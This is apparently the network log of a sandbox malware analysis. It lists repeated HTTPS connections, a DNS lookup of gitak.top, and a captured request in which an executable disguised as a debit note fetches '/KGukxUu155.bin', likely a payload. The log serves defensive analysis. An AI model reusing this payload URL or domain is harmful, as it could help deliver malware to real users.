Aug 26, 2024 15:38:11.361259937 CEST	443	49851	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:11.361462116 CEST	49851	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:11.361799002 CEST	49851	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:11.361813068 CEST	443	49851	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:11.361875057 CEST	49851	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:11.361888885 CEST	443	49851	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:11.609416008 CEST	443	49851	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:11.609587908 CEST	49851	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:11.609652996 CEST	443	49851	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:11.609792948 CEST	49851	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:11.609838963 CEST	443	49851	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:11.610025883 CEST	49851	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:11.610038042 CEST	443	49851	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:11.610074043 CEST	443	49851	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:11.610397100 CEST	49851	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:11.610398054 CEST	49851	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:11.610466957 CEST	443	49851	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:11.610549927 CEST	443	49851	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:11.610690117 CEST	49851	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:11.610785961 CEST	49851	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:11.610785961 CEST	49851	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:11.610832930 CEST	443	49851	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:21.639687061 CEST	49852	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:21.639786959 CEST	443	49852	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:21.640011072 CEST	49852	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:21.640266895 CEST	49852	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:21.640338898 CEST	443	49852	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:21.858092070 CEST	443	49852	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:21.858270884 CEST	49852	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:21.858635902 CEST	49852	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:21.858683109 CEST	443	49852	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:21.858762026 CEST	49852	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:21.858810902 CEST	443	49852	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:22.106161118 CEST	443	49852	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:22.106458902 CEST	443	49852	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:22.106456041 CEST	49852	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:22.106528997 CEST	443	49852	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:22.106657982 CEST	49852	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:22.106812000 CEST	443	49852	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:22.106853008 CEST	49852	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:22.106900930 CEST	443	49852	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:22.107168913 CEST	443	49852	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:22.107188940 CEST	49852	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:22.107188940 CEST	49852	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:22.107352972 CEST	49852	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:22.107424021 CEST	49852	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:22.107481003 CEST	443	49852	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:32.137399912 CEST	49853	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:32.137547016 CEST	443	49853	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:32.137893915 CEST	49853	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:32.138010025 CEST	49853	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:32.138056040 CEST	443	49853	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:32.357911110 CEST	443	49853	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:32.358088017 CEST	49853	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:32.358429909 CEST	49853	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:32.358464956 CEST	443	49853	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:32.358577013 CEST	49853	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:32.358619928 CEST	443	49853	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:32.607037067 CEST	443	49853	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:32.607214928 CEST	49853	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:32.607287884 CEST	443	49853	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:32.607453108 CEST	49853	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:32.607492924 CEST	443	49853	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:32.607522011 CEST	443	49853	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:32.607630014 CEST	49853	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:32.607734919 CEST	49853	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:32.607760906 CEST	443	49853	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:32.608005047 CEST	49853	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:32.608038902 CEST	443	49853	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:32.608305931 CEST	49853	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:32.608305931 CEST	49853	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:32.917314053 CEST	49853	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:32.917392015 CEST	443	49853	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:42.635023117 CEST	49854	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:42.635055065 CEST	443	49854	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:42.635252953 CEST	49854	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:42.635416985 CEST	49854	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:42.635432005 CEST	443	49854	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:42.849822998 CEST	443	49854	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:42.849987984 CEST	49854	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:42.850259066 CEST	49854	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:42.850296021 CEST	443	49854	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:42.850363016 CEST	49854	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:42.850395918 CEST	443	49854	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:43.103478909 CEST	443	49854	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:43.103620052 CEST	443	49854	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:43.103697062 CEST	443	49854	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:43.103720903 CEST	49854	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:43.103744030 CEST	443	49854	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:43.103753090 CEST	443	49854	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:43.103795052 CEST	49854	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:43.103859901 CEST	49854	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:43.103859901 CEST	49854	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:43.103878975 CEST	443	49854	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:43.103904009 CEST	443	49854	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:43.103977919 CEST	49854	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:43.104108095 CEST	49854	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:43.104135036 CEST	443	49854	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:53.133133888 CEST	49855	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:53.133157969 CEST	443	49855	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:53.133320093 CEST	49855	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:53.133518934 CEST	49855	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:53.133529902 CEST	443	49855	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:53.343635082 CEST	443	49855	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:53.343859911 CEST	49855	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:53.344171047 CEST	49855	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:53.344192028 CEST	443	49855	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:53.344302893 CEST	49855	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:53.344317913 CEST	443	49855	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:53.610261917 CEST	443	49855	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:53.610316038 CEST	443	49855	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:53.610352993 CEST	443	49855	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:53.610400915 CEST	443	49855	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:53.610400915 CEST	49855	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:53.610420942 CEST	443	49855	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:53.610529900 CEST	443	49855	172.67.207.219	192.168.11.20
Aug 26, 2024 15:38:53.610579967 CEST	49855	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:53.610712051 CEST	49855	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:53.610790014 CEST	49855	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:38:53.610806942 CEST	443	49855	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:03.630495071 CEST	49856	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:03.630518913 CEST	443	49856	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:03.630637884 CEST	49856	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:03.630847931 CEST	49856	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:03.630856037 CEST	443	49856	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:03.840470076 CEST	443	49856	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:03.840593100 CEST	49856	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:03.840929985 CEST	49856	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:03.840938091 CEST	443	49856	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:03.841048956 CEST	49856	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:03.841056108 CEST	443	49856	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:04.092581034 CEST	443	49856	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:04.092705965 CEST	443	49856	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:04.092747927 CEST	49856	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:04.092780113 CEST	443	49856	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:04.092853069 CEST	443	49856	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:04.092864990 CEST	49856	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:04.092977047 CEST	49856	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:04.092992067 CEST	443	49856	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:04.093003035 CEST	49856	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:04.093028069 CEST	443	49856	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:04.093230963 CEST	49856	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:04.093395948 CEST	49856	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:04.093421936 CEST	443	49856	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:14.112541914 CEST	49857	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:14.112572908 CEST	443	49857	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:14.112709999 CEST	49857	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:14.112943888 CEST	49857	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:14.112953901 CEST	443	49857	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:14.324450970 CEST	443	49857	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:14.324574947 CEST	49857	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:14.325057030 CEST	49857	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:14.325068951 CEST	443	49857	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:14.325189114 CEST	49857	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:14.325200081 CEST	443	49857	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:14.577018023 CEST	443	49857	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:14.577220917 CEST	49857	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:14.577269077 CEST	443	49857	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:14.577301979 CEST	443	49857	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:14.577440023 CEST	49857	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:14.577440023 CEST	49857	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:14.577522993 CEST	443	49857	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:14.577670097 CEST	49857	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:14.577702045 CEST	443	49857	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:14.577887058 CEST	49857	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:14.577907085 CEST	443	49857	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:14.578032970 CEST	49857	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:14.578083992 CEST	49857	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:14.578140974 CEST	443	49857	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:24.610229969 CEST	49858	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:24.610255003 CEST	443	49858	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:24.610470057 CEST	49858	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:24.610656977 CEST	49858	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:24.610665083 CEST	443	49858	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:24.819818974 CEST	443	49858	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:24.820019960 CEST	49858	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:24.820360899 CEST	49858	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:24.820365906 CEST	443	49858	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:24.820533037 CEST	49858	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:24.820538998 CEST	443	49858	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:25.088606119 CEST	443	49858	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:25.088648081 CEST	443	49858	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:25.088685036 CEST	443	49858	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:25.088768959 CEST	443	49858	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:25.088803053 CEST	49858	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:25.088812113 CEST	443	49858	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:25.088850975 CEST	49858	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:25.088933945 CEST	49858	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:25.091528893 CEST	443	49858	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:25.091567993 CEST	443	49858	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:25.091701984 CEST	49858	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:25.091753960 CEST	49858	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:25.091753960 CEST	49858	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:25.091763973 CEST	443	49858	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:25.091856956 CEST	49858	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:35.108133078 CEST	49859	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:35.108171940 CEST	443	49859	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:35.108347893 CEST	49859	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:35.108571053 CEST	49859	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:35.108587980 CEST	443	49859	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:35.320486069 CEST	443	49859	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:35.320568085 CEST	49859	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:35.320904970 CEST	49859	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:35.320911884 CEST	443	49859	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:35.321011066 CEST	49859	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:35.321013927 CEST	443	49859	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:35.568538904 CEST	443	49859	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:35.568588972 CEST	443	49859	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:35.568636894 CEST	443	49859	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:35.568658113 CEST	443	49859	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:35.568720102 CEST	49859	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:35.568736076 CEST	443	49859	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:35.568744898 CEST	443	49859	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:35.568861961 CEST	49859	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:35.568921089 CEST	49859	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:35.569014072 CEST	49859	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:35.569036007 CEST	443	49859	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:45.590059042 CEST	49860	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:45.590095043 CEST	443	49860	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:45.590260983 CEST	49860	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:45.590436935 CEST	49860	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:45.590447903 CEST	443	49860	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:45.801971912 CEST	443	49860	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:45.802196980 CEST	49860	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:45.802535057 CEST	49860	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:45.802550077 CEST	443	49860	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:45.802669048 CEST	49860	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:45.802680016 CEST	443	49860	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:46.050287962 CEST	443	49860	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:46.050322056 CEST	443	49860	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:46.050446033 CEST	443	49860	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:46.050471067 CEST	49860	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:46.050471067 CEST	49860	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:46.050478935 CEST	443	49860	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:46.050487041 CEST	443	49860	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:46.050719023 CEST	49860	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:46.050726891 CEST	443	49860	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:46.050734997 CEST	443	49860	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:46.051098108 CEST	49860	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:46.051098108 CEST	49860	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:46.354495049 CEST	49860	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:46.354535103 CEST	443	49860	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:56.073416948 CEST	49861	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:56.073440075 CEST	443	49861	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:56.073612928 CEST	49861	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:56.074012041 CEST	49861	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:56.074019909 CEST	443	49861	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:56.286801100 CEST	443	49861	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:56.287040949 CEST	49861	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:56.287314892 CEST	49861	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:56.287338018 CEST	443	49861	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:56.287420034 CEST	49861	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:56.287441969 CEST	443	49861	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:56.534035921 CEST	443	49861	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:56.534116030 CEST	443	49861	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:56.534221888 CEST	49861	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:56.534235001 CEST	443	49861	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:56.534322023 CEST	49861	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:56.534322977 CEST	443	49861	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:56.534390926 CEST	49861	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:56.534400940 CEST	443	49861	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:56.534440041 CEST	443	49861	172.67.207.219	192.168.11.20
Aug 26, 2024 15:39:56.534475088 CEST	49861	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:56.534573078 CEST	49861	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:56.534737110 CEST	49861	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:39:56.534745932 CEST	443	49861	172.67.207.219	192.168.11.20
Aug 26, 2024 15:40:06.554431915 CEST	49862	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:40:06.554454088 CEST	443	49862	172.67.207.219	192.168.11.20
Aug 26, 2024 15:40:06.554626942 CEST	49862	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:40:06.554811001 CEST	49862	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:40:06.554816961 CEST	443	49862	172.67.207.219	192.168.11.20
Aug 26, 2024 15:40:06.766609907 CEST	443	49862	172.67.207.219	192.168.11.20
Aug 26, 2024 15:40:06.766737938 CEST	49862	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:40:06.767076969 CEST	49862	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:40:06.767081976 CEST	443	49862	172.67.207.219	192.168.11.20
Aug 26, 2024 15:40:06.767222881 CEST	49862	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:40:06.767230988 CEST	443	49862	172.67.207.219	192.168.11.20
Aug 26, 2024 15:40:07.011872053 CEST	443	49862	172.67.207.219	192.168.11.20
Aug 26, 2024 15:40:07.011897087 CEST	443	49862	172.67.207.219	192.168.11.20
Aug 26, 2024 15:40:07.012006044 CEST	443	49862	172.67.207.219	192.168.11.20
Aug 26, 2024 15:40:07.012031078 CEST	49862	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:40:07.012042046 CEST	443	49862	172.67.207.219	192.168.11.20
Aug 26, 2024 15:40:07.012115955 CEST	443	49862	172.67.207.219	192.168.11.20
Aug 26, 2024 15:40:07.012121916 CEST	49862	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:40:07.012212038 CEST	49862	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:40:07.012403965 CEST	49862	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:40:07.012403965 CEST	49862	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:40:07.318797112 CEST	49862	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:40:07.318816900 CEST	443	49862	172.67.207.219	192.168.11.20
Aug 26, 2024 15:40:17.037205935 CEST	49863	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:40:17.037270069 CEST	443	49863	172.67.207.219	192.168.11.20
Aug 26, 2024 15:40:17.037518024 CEST	49863	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:40:17.037827015 CEST	49863	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:40:17.037862062 CEST	443	49863	172.67.207.219	192.168.11.20
Aug 26, 2024 15:40:17.253273010 CEST	443	49863	172.67.207.219	192.168.11.20
Aug 26, 2024 15:40:17.253395081 CEST	49863	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:40:17.253696918 CEST	49863	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:40:17.253701925 CEST	443	49863	172.67.207.219	192.168.11.20
Aug 26, 2024 15:40:17.253824949 CEST	49863	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:40:17.253829956 CEST	443	49863	172.67.207.219	192.168.11.20
Aug 26, 2024 15:40:17.503278017 CEST	443	49863	172.67.207.219	192.168.11.20
Aug 26, 2024 15:40:17.503346920 CEST	443	49863	172.67.207.219	192.168.11.20
Aug 26, 2024 15:40:17.503457069 CEST	49863	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:40:17.503467083 CEST	443	49863	172.67.207.219	192.168.11.20
Aug 26, 2024 15:40:17.503475904 CEST	443	49863	172.67.207.219	192.168.11.20
Aug 26, 2024 15:40:17.503506899 CEST	49863	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:40:17.503612995 CEST	49863	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:40:17.503619909 CEST	443	49863	172.67.207.219	192.168.11.20
Aug 26, 2024 15:40:17.503761053 CEST	49863	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:40:17.506861925 CEST	443	49863	172.67.207.219	192.168.11.20
Aug 26, 2024 15:40:17.506928921 CEST	443	49863	172.67.207.219	192.168.11.20
Aug 26, 2024 15:40:17.506978035 CEST	49863	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:40:17.507031918 CEST	49863	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:40:17.507038116 CEST	443	49863	172.67.207.219	192.168.11.20
Aug 26, 2024 15:40:17.507081032 CEST	49863	443	192.168.11.20	172.67.207.219
Aug 26, 2024 15:40:17.507178068 CEST	49863	443	192.168.11.20	172.67.207.219

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 26, 2024 15:32:13.301465034 CEST	50453	53	192.168.11.20	1.1.1.1
Aug 26, 2024 15:32:13.411161900 CEST	53	50453	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 26, 2024 15:32:13.301465034 CEST	192.168.11.20	1.1.1.1	0xf248	Standard query (0)	gitak.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 26, 2024 15:32:13.411161900 CEST	1.1.1.1	192.168.11.20	0xf248	No error (0)	gitak.top		172.67.207.219	A (IP address)	IN (0x0001)	false
Aug 26, 2024 15:32:13.411161900 CEST	1.1.1.1	192.168.11.20	0xf248	No error (0)	gitak.top		104.21.22.240	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

gitak.top

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49817	172.67.207.219	443	5076	C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-26 13:32:13 UTC	168	OUT	GET /KGukxUu155.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: gitak.top Cache-Control: no-cache
